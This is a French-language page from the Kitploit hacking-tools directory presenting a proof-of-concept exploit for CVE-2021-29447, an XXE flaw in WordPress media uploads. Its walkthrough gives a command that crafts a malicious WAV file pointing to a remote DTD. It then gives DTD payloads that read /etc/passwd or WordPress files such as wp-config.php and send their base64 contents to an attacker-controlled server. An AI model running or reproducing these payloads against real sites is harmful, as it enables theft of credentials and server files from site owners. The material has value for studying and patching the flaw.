Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-29447 — Preuve de concept d'exploitation pour CVE-2021-29447, une vulnérabilité XXE de WordPress permettant la divulgation arbitraire de fichiers et une SSRF via des fichiers WAV spécialement conçus. | Kitploit
Outils/GitHubGitHub/assassinukg/cve-2021-29447
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsSécurité WebTests d'Intrusion
GitHubassassinukg/cve-2021-29447

CVE-2021-29447

Preuve de concept d'exploitation pour CVE-2021-29447, une vulnérabilité XXE de WordPress permettant la divulgation arbitraire de fichiers et une SSRF via des fichiers WAV spécialement conçus.

Voir le dépôt
1il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-29447

Impact

Divulgation arbitraire de fichiers : le contenu de tout fichier sur le système de fichiers de l'hôte pourrait être récupéré, par exemple wp-config.php qui contient des données sensibles telles que les identifiants de base de données. Falsification de requête côté serveur (SSRF) : des requêtes HTTP pourraient être effectuées au nom de l'installation WordPress. Selon l'environnement, cela peut avoir un impact sérieux. Exploitation de la vulnérabilité

Un site WordPress affecté par cette vulnérabilité a été identifié lors du processus d'énumération à l'aide de l'outil wpscan.

image

Création d'un fichier WAV malveillant.

C'est très simple, dans votre console bash

nano poc.wav echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSEVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

Sur votre machine attaquante, créez un fichier dtd avec le code exécuté sur le serveur web.

root@kitploit:~
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >

Remarque : pour lire les fichiers WordPress, utilisez la syntaxe "../WP-FILE.php"

root@kitploit:~
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=../index.php">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >

Hébergez un serveur python dans le répertoire des fichiers (python3 -m http.server 8081)

Références :

https://github.com/motikan2010/CVE-2021-29447 https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5

Télécharger l’outil